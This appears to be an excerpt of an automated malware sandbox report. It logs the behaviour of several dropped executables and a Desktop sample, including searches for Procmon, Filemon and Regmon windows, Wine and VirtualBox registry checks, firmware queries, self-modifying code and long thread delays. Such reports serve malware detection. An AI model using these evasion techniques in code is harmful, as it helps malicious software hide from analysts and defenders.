Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	System information queried: FirmwareTableInformation

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Special instruction interceptor: First address: 9AEB20 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Special instruction interceptor: First address: 9AEA79 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Special instruction interceptor: First address: BD48AC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 18EB20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 18EA79 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3B48AC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Special instruction interceptor: First address: 473CF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Special instruction interceptor: First address: 473D86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Special instruction interceptor: First address: 61FC0D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Special instruction interceptor: First address: 6AD456 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Memory allocated: 20E81460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Memory allocated: 20E997A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Memory allocated: 1890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Memory allocated: 35B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Memory allocated: 18F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 2380000 memory reserve \| memory write watch
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1A720000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 1199062
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 599172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 939	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1321	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 436	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1048	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1408	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Window / User API: threadDelayed 2637	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Window / User API: threadDelayed 7161	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Window / User API: foregroundWindowGot 1765	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 9440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7867
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7643